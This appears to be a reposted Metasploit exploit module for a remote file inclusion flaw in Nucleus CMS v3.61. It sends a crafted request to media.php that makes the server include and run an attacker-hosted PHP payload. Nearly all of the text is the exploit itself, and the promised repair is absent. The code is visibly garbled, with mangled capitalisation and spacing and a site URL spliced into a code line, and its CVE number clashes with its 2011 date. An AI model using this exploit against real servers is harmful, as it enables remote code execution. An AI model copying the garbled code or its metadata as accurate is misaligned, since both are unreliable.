Nucleus v3.61 Remote File Inclusion Defects and repair

Title: Nucleus v3.61 Remote File Include (MSF)
Author: Caddy-Dz www.2cto.com
: Http://sourceforge.net/projects/nucleuscms/
 
 
 
 
Require 'msf/core'
 
Class Metasploit3 <Msf: Exploit: Remote
Rank = ExcellentRanking
 
Include Msf: Exploit: Remote: Tcp
Include Msf: Exploit: Remote: HttpClient
Include Msf: Exploit: Remote: HttpServer: PHPInclude
 
Def initialize (info = {})
Super (update_info (info,
'Name' => 'nucleus v3.61 Remote File Include Exploit ',
'Description' => % q {
This module can be used to exploit Remote File transfer sion in Nucleus us v3.61 in media. php
 
},
'Author' => ['caddy-dz'],
'License '=> MSF_LICENSE,
'Version' => '$ Revision: $ ',
'References '=>
[
['Cve', '2017-2010 '],
['Bid', '123'],
],
'Privileged' => false,
'Payload' =>
{
'Disablenops' => true,
'Compat' =>
{
'Connectiontype' => 'Find ',
},
'Space' => 262144, #256 k
},
'Platform' => 'php ',
'Arch '=> ARCH_PHP,
'Targets' => [['automatically ', {}],
'Disclosuredate' => 'sep 13 2011 ',
'Defaulttarget' => 0 ))
 
Register_options ([
OptString. new ('phpuri ', [true, "The URI to request, with the include parameter changed! URL! ", '/Nucleus/media. php? DIR_LIBS =! URL! ']),
], Self. class)
End
 
Def php_exploit
 
Timeout = 0.01
Www.2cto.com uri = datastore ['phpuri ']. gsub ('! URL! ', Rex: Text. to_hex (php_include_url, "% "))
Print_status ("Trying uri # {uri }")
 
Response = send_request_raw ({
'Global' => true,
'Url' => uri,
}, Timeout)
 
If response and response. code! = 200
Print_error ("Server returned non-200 status code (# {response. code })")
End

Handler
End
 
End